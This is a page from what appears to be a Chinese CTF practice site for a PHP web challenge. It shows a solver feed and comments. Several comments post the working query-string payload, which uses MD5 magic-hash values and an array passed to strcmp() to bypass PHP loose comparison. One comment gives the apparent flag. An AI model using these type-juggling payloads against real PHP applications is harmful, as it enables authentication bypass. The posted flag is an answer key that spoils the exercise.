评分(12)
解题动态
Julia 攻破了该题 2小时前
没有伞的小白帽 攻破了该题 5小时前
17361232956 攻破了该题 6小时前
楼主甜甜圈 攻破了该题 9小时前
hahahahahahaha 攻破了该题 9小时前
orange2015 攻破了该题 1天前
hanzkj 攻破了该题 1天前
xiemeimei 攻破了该题 1天前
malx 攻破了该题 1天前
desireart 攻破了该题 1天前
2757547892 攻破了该题 2天前
要加两个蛋 攻破了该题 2天前
zcgzcx1234 攻破了该题 2天前
yjyyds 攻破了该题 2天前
walkerming 攻破了该题 3天前
欲语泪先流 攻破了该题 3天前
吴王饭差 攻破了该题 3天前
1234567nxb 攻破了该题 3天前
kzlkzl 攻破了该题 3天前
评论
emm不取名字了 4月前
举报
flag{*****}
3344 5月前
举报
flag{**********}
Arya32f 5月前
举报
/?v1=QNKCDZO&v2=240610708&v3[]=1或者/?v1[]=1&v2[]=2&v3[]=1
HK1ng 5月前
举报
首先CTRL+U查看源码,发现存在超链接,点击进去之后,代码审计,第一关是md5弱类型比较,然后用了strcmp()函数进行弱类型比较,直接传一个数组,PHP 8.0 前 strcmp() 会返回 null,加上取反,直接绕过。
goodsnack 6月前
举报
弱类型比较,传数组即可
harven 6月前
举报
http://example.com/?v1=QNKCDZO&v2=240610708&v3[]=test
smtall 6月前
举报
用deepseek做出来了
大棕兔爸爸 7月前
举报
存在两个漏洞点:1. md5的松散比较绕过;2. strcmp的类型漏洞导致比较结果为0。攻击者需要同时利用这两个漏洞才能获取到flag。 完整Payload: ?v1=240610708&v2=QNKCDZO&v3[]=abc
welltian 9月前
举报
/?v1=QNKCDZO&v2=240610708&v3[]=123
33555 9月前
举报
/?v1[]=1&v2[]=2&v3[]=1flag{f78a31880b6bf8800597a997e130155f}